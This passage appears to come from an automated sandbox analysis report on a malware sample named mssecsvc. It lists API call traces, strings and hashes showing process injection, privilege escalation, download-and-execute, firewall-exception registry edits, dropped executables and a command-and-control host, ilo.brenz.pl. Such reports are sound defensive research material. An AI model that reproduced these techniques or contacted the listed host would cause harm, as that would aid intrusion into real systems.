• MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00AC3493
• CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00AC34A0
• UnmapViewOfFile.KERNEL32(?), ref: 00AC34B8
Strings
Memory Dump Source
• Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
• String ID: C:,$ysic
• API String ID: 2985292042-2852681185
• Opcode ID: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
• Instruction ID: 0a394d266af3059d0b7e8a43ae7c773aa28f9baead7ec7dc99eff1d737410276
• Opcode Fuzzy Hash: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
• Instruction Fuzzy Hash: 15116D71140608BBEB24CF14DC59FEA367DEF88704F51851CEA199B290E7F46F148A69
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetTempFileNameA.KERNEL32(?,00AC27A3,00000000,?), ref: 00AC27A8
• CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,00AC27A3,00000000,?), ref: 00AC27C3
• InternetReadFile.WININET(?,?,00000104), ref: 00AC27DD
• WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,00AC27A3,00000000,?), ref: 00AC27F3
• CloseHandle.KERNEL32(?,00000104,?,00000000,?,00AC27A3,00000000,?), ref: 00AC27FF
• CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,00AC27A3), ref: 00AC2823
• InternetCloseHandle.WININET(?), ref: 00AC2833
• InternetCloseHandle.WININET(00000000), ref: 00AC283A
Memory Dump Source
• Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: File$CloseHandleInternet$Create$NameProcessReadTempWrite
• String ID:
• API String ID: 3452404049-0
• Opcode ID: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
• Instruction ID: 4f75b582316cc80b2459c3936248e5078d11b2ab0a187313c3f79fd4682b5732
• Opcode Fuzzy Hash: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
• Instruction Fuzzy Hash: E7116DB1100606BBEB254B20CC8AFFB7A2DEF94B10F004519FA0699080DBF59E5196A8
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$AttributesCreate$MappingView
                                                                                                                                                • String ID: !$&$&$($@$nr
                                                                                                                                                • API String ID: 1961427682-1764398444
                                                                                                                                                • Opcode ID: 2381df1fe8655b0b15eefe916bab3e4e4fd8ee643c315c9c97763fa0453a1d75
                                                                                                                                                • Instruction ID: 4494a994f479d84deb6db3ff93facf62294d44c41ed5d8649dc2cc80e70bdf8a
                                                                                                                                                • Opcode Fuzzy Hash: 2381df1fe8655b0b15eefe916bab3e4e4fd8ee643c315c9c97763fa0453a1d75
                                                                                                                                                • Instruction Fuzzy Hash: 4D823232505309EFDB26CF28C4457B97BBAEF41328F105259D81A8F295D3B6AF94CB81
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • lstrcpyW.KERNEL32(?,\BaseNamedObjects\axytVt), ref: 7FEA24BA
                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 7FEA24C1
                                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,00000000), ref: 7FEA2516
                                                                                                                                                Strings
                                                                                                                                                • \BaseNamedObjects\axytVt, xrefs: 7FEA24B8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateSectionlstrcpylstrlen
                                                                                                                                                • String ID: \BaseNamedObjects\axytVt
                                                                                                                                                • API String ID: 2597515329-2943719413
                                                                                                                                                • Opcode ID: 5efba258f8302b02041225dfc858dfd66927e0db76a5c7373e0b6d2406f524bb
                                                                                                                                                • Instruction ID: 36f5e8d8b616a1b6a077d728ef6f106cfb6906c53de1e66307b1d1f9a2e55959
                                                                                                                                                • Opcode Fuzzy Hash: 5efba258f8302b02041225dfc858dfd66927e0db76a5c7373e0b6d2406f524bb
                                                                                                                                                • Instruction Fuzzy Hash: A40181B0781344BAF7309B29CC4BF5F7929DF81B50F908558F608AE1C4DAB89A0483A9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • lstrcpyW.KERNEL32(?,\BaseNamedObjects\axytVt), ref: 00AC24BA
                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00AC24C1
                                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,00000000), ref: 00AC2516
                                                                                                                                                Strings
                                                                                                                                                • \BaseNamedObjects\axytVt, xrefs: 00AC24B8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateSectionlstrcpylstrlen
                                                                                                                                                • String ID: \BaseNamedObjects\axytVt
                                                                                                                                                • API String ID: 2597515329-2943719413
                                                                                                                                                • Opcode ID: 5efba258f8302b02041225dfc858dfd66927e0db76a5c7373e0b6d2406f524bb
                                                                                                                                                • Instruction ID: 00ec5dd88c16499f5e70d7096b6cb17fa9b88d584653376cddaf99cf016e6dec
                                                                                                                                                • Opcode Fuzzy Hash: 5efba258f8302b02041225dfc858dfd66927e0db76a5c7373e0b6d2406f524bb
                                                                                                                                                • Instruction Fuzzy Hash: 8A0181B0781304BAF7309B29CC4BF5F7929DF81B50F948558F608AE1C5DAB89A0483A9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • NtOpenSection.NTDLL(?,0000000E), ref: 7FEA255E
                                                                                                                                                Strings
                                                                                                                                                • \BaseNamedObjects\axytVt, xrefs: 7FEA254B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: OpenSection
                                                                                                                                                • String ID: \BaseNamedObjects\axytVt
                                                                                                                                                • API String ID: 1950954290-2943719413
                                                                                                                                                • Opcode ID: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
                                                                                                                                                • Instruction ID: cc492c20b74137972e1aeb42a549193fdcd5baff80c1f90c3202c4eb3a6ea2fd
                                                                                                                                                • Opcode Fuzzy Hash: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
                                                                                                                                                • Instruction Fuzzy Hash: A1E0DFF1342105BAFB288B19CC07FB7220DCBC0600F048604F918DA090E6F4AF104278
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 7FEA252F: NtOpenSection.NTDLL(?,0000000E), ref: 7FEA255E
                                                                                                                                                • NtMapViewOfSection.NTDLL(00000000,?,?,00000000,0000B7C4,00000000,?,00000002,00100000,00000040), ref: 7FEA25A4
                                                                                                                                                • CloseHandle.KERNEL32(00000000,0000B7C4,00000000,?,00000002,00100000,00000040,00000000,0000B7C4,00000000,?,7FEA0815), ref: 7FEA25AC
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Section$CloseHandleOpenView
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2731707328-0
                                                                                                                                                • Opcode ID: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
                                                                                                                                                • Instruction ID: 3cc34a18b6b0f74ef45f64819b33cb598c6401d77195fbf03454f98489c8026e
                                                                                                                                                • Opcode Fuzzy Hash: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
                                                                                                                                                • Instruction Fuzzy Hash: 9A21F970301646BBDB18DE65CC55FBA7369FF80648F401118E85ABE1D4DBB2BA24C758
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 7FEA145A
                                                                                                                                                • NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 7FEA146A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3615134276-0
                                                                                                                                                • Opcode ID: 4d961b29825b6918877cf0b8ca3bbdf1a1a783037955428b050f6265267c3a26
                                                                                                                                                • Instruction ID: ddbff97e699881e74d61e2820170bd54818263a6fff0c1519b9bac5ac29647fb
                                                                                                                                                • Opcode Fuzzy Hash: 4d961b29825b6918877cf0b8ca3bbdf1a1a783037955428b050f6265267c3a26
                                                                                                                                                • Instruction Fuzzy Hash: 5BF0AE36542510BBD7205F56CD8EED77F28EF533A0F144556F4484E151C2624BA5D3F4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,00000040), ref: 7FEA249B
                                                                                                                                                • NtWriteVirtualMemory.NTDLL ref: 7FEA24A4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MemoryVirtual$ProtectWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 151266762-0
                                                                                                                                                • Opcode ID: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
                                                                                                                                                • Instruction ID: 6bbb67ea70d6ee96dfa5f1d7b4d314b28acc786a60d934acbd3f762ecc45b662
                                                                                                                                                • Opcode Fuzzy Hash: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
                                                                                                                                                • Instruction Fuzzy Hash: 2AE012E07502007FF5185F55DC5FF7B391DDB41751F410208FA0A981C4F9A15E18467A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 7FEA145A
                                                                                                                                                • NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 7FEA146A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3615134276-0
                                                                                                                                                • Opcode ID: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
                                                                                                                                                • Instruction ID: ee32c209e3d0a2de55b6acbdbca8a3d00d8b73f2470e3acbbab87dcaf3c2c19a
                                                                                                                                                • Opcode Fuzzy Hash: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
                                                                                                                                                • Instruction Fuzzy Hash: F2D06731643034BBD6312A568C0EEE77D1DEF577A0F015041F9089A1A1C5A28EA1C7F5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd

Memory Dump Source
• Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd

Memory Dump Source
• Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd

Memory Dump Source
• Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd

APIs
• LoadLibraryA.KERNEL32(7FEA3F83), ref: 7FEA3F8F
• WSAStartup.WS2_32(00000101), ref: 7FEA3FCE
• CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
• CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
• lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 7FEA4057
• gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FEA4066
• socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
• connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
• GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
• wsprintfA.USER32 ref: 7FEA4179
• CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 7FEA41B4
• CloseHandle.KERNEL32(?,00000000,6F6C6902,7FEA6AA2,00000000,00000000), ref: 7FEA41BD
• GetTickCount.KERNEL32 ref: 7FEA41F6
• RtlExitUserThread.NTDLL(00000000), ref: 7FEA4322
Strings
• C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe, xrefs: 7FEA4195, 7FEA41DB
• \DEVICE\AFD\ENDPOINT, xrefs: 7FEA41DA
• ilo.brenz.pl, xrefs: 7FEA4056, 7FEA4065
Memory Dump Source
• Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd

APIs
• LoadLibraryA.KERNEL32(00AC3F83), ref: 00AC3F8F
• WSAStartup.WS2_32(00000101), ref: 00AC3FCE
• CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00AC3FE9
• CloseHandle.KERNEL32(?,00000000), ref: 00AC3FF2
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00AC3FFF
• lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00AC4057
• gethostbyname.WS2_32(ilo.brenz.pl), ref: 00AC4066
• socket.WS2_32(00000002,00000001,00000000), ref: 00AC4097
• connect.WS2_32(6F6C6902,00AC3B09,00000010), ref: 00AC40B1
• GetVersionExA.KERNEL32(?,?,00000000), ref: 00AC40FB
• wsprintfA.USER32 ref: 00AC4179
• CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00AC41B4
• CloseHandle.KERNEL32(?,00000000,6F6C6902,00AC6AA2,00000000,00000000), ref: 00AC41BD
• GetTickCount.KERNEL32 ref: 00AC41F6
• RtlExitUserThread.NTDLL(00000000), ref: 00AC4322
Strings
• C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe, xrefs: 00AC4195, 00AC41DB
• ilo.brenz.pl, xrefs: 00AC4056, 00AC4065
• C:\WINDOWS\TASKSCHE.EXE, xrefs: 00AC41DA
Memory Dump Source
• Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd

APIs
• LoadLibraryA.KERNEL32(7FEA3EA9), ref: 7FEA3EB5
  • Part of subcall function 7FEA3ECC: GetProcAddress.KERNEL32(00000000,7FEA3EC0), ref: 7FEA3ECD
  • Part of subcall function 7FEA3ECC: GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,000000C8), ref: 7FEA3EE2
  • Part of subcall function 7FEA3ECC: wsprintfA.USER32 ref: 7FEA3EF7
  • Part of subcall function 7FEA3ECC: CreateThread.KERNEL32(00000000,00000000,7FEA3691,00000000,00000000), ref: 7FEA3F40
  • Part of subcall function 7FEA3ECC: CloseHandle.KERNEL32(?,E81213EA), ref: 7FEA3F49
• CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
• CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
• socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
• connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
• GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
• wsprintfA.USER32 ref: 7FEA4179
Strings
• C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe, xrefs: 7FEA3EDF, 7FEA3EF4, 7FEA3F0B, 7FEA4195, 7FEA41DB
• C:,, xrefs: 7FEA3EF6, 7FEA3F08
• \DEVICE\AFD\ENDPOINT, xrefs: 7FEA41DA
• SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FEA3F0C
Memory Dump Source
• Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd

APIs
• LoadLibraryA.KERNEL32(00AC3EA9), ref: 00AC3EB5
  • Part of subcall function 00AC3ECC: GetProcAddress.KERNEL32(00000000,00AC3EC0), ref: 00AC3ECD
  • Part of subcall function 00AC3ECC: GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,000000C8), ref: 00AC3EE2
  • Part of subcall function 00AC3ECC: wsprintfA.USER32 ref: 00AC3EF7
  • Part of subcall function 00AC3ECC: CreateThread.KERNEL32(00000000,00000000,00AC3691,00000000,00000000), ref: 00AC3F40
  • Part of subcall function 00AC3ECC: CloseHandle.KERNEL32(?,E81213EA), ref: 00AC3F49
• CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00AC3FE9
• CloseHandle.KERNEL32(?,00000000), ref: 00AC3FF2
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00AC3FFF
• socket.WS2_32(00000002,00000001,00000000), ref: 00AC4097
• connect.WS2_32(6F6C6902,00AC3B09,00000010), ref: 00AC40B1
                                                                                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 00AC40FB
                                                                                                                                                • wsprintfA.USER32 ref: 00AC4179
                                                                                                                                                Strings
                                                                                                                                                • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00AC3F0C
                                                                                                                                                • C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe, xrefs: 00AC3EDF, 00AC3EF4, 00AC3F0B, 00AC4195, 00AC41DB
                                                                                                                                                • C:,, xrefs: 00AC3EF6, 00AC3F08
                                                                                                                                                • C:\WINDOWS\TASKSCHE.EXE, xrefs: 00AC41DA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Create$CloseHandleThreadwsprintf$AddressEventFileLibraryLoadModuleNameProcVersionconnectsocket
                                                                                                                                                • String ID: C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                                                                                • API String ID: 4150863296-1428418298
                                                                                                                                                • Opcode ID: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
                                                                                                                                                • Instruction ID: a6a1000a0bd5110e847cf5ba0197f15932b6314e4b97b4582aeae809fbfdcd83
                                                                                                                                                • Opcode Fuzzy Hash: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
                                                                                                                                                • Instruction Fuzzy Hash: 26A1DF72508248BFEB219F248C5EFEA7BACEF45300F06464DE84A9E082D6F45F45C7A5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,7FEA3EC0), ref: 7FEA3ECD
                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,000000C8), ref: 7FEA3EE2
                                                                                                                                                • wsprintfA.USER32 ref: 7FEA3EF7
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,7FEA3691,00000000,00000000), ref: 7FEA3F40
                                                                                                                                                • CloseHandle.KERNEL32(?,E81213EA), ref: 7FEA3F49
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
                                                                                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
                                                                                                                                                  • Part of subcall function 7FEA3405: NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FEA344A
                                                                                                                                                  • Part of subcall function 7FEA3405: NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FEA3469
                                                                                                                                                  • Part of subcall function 7FEA3405: MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FEA3493
                                                                                                                                                  • Part of subcall function 7FEA3405: CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FEA34A0
                                                                                                                                                  • Part of subcall function 7FEA3405: UnmapViewOfFile.KERNEL32(?), ref: 7FEA34B8
                                                                                                                                                Strings
                                                                                                                                                • C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe, xrefs: 7FEA3EDF, 7FEA3EF4, 7FEA3F0B, 7FEA4195, 7FEA41DB
                                                                                                                                                • C:,, xrefs: 7FEA3EF6, 7FEA3F08
                                                                                                                                                • \DEVICE\AFD\ENDPOINT, xrefs: 7FEA41DA
                                                                                                                                                • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FEA3F0C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseCreateFileHandle$ThreadView$AddressEventInformationModuleNameOpenProcQuerySectionSystemUnmapwsprintf
                                                                                                                                                • String ID: C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                                                                                                                                                • API String ID: 541178049-3048976199
                                                                                                                                                • Opcode ID: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
                                                                                                                                                • Instruction ID: d9e398f0cb57442fd0ba00def27d3fe33590f3ea382637dc010686527708efc5
                                                                                                                                                • Opcode Fuzzy Hash: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
                                                                                                                                                • Instruction Fuzzy Hash: 65A10071408348BFEB219F348C49BEA7BACEF81304F004659E84A9E091D7F66F05C7A1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00AC3EC0), ref: 00AC3ECD
                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,000000C8), ref: 00AC3EE2
                                                                                                                                                • wsprintfA.USER32 ref: 00AC3EF7
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,00AC3691,00000000,00000000), ref: 00AC3F40
                                                                                                                                                • CloseHandle.KERNEL32(?,E81213EA), ref: 00AC3F49
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00AC3FE9
                                                                                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 00AC3FF2
                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00AC3FFF
                                                                                                                                                  • Part of subcall function 00AC3405: NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00AC344A
                                                                                                                                                  • Part of subcall function 00AC3405: NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00AC3469
                                                                                                                                                  • Part of subcall function 00AC3405: MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00AC3493
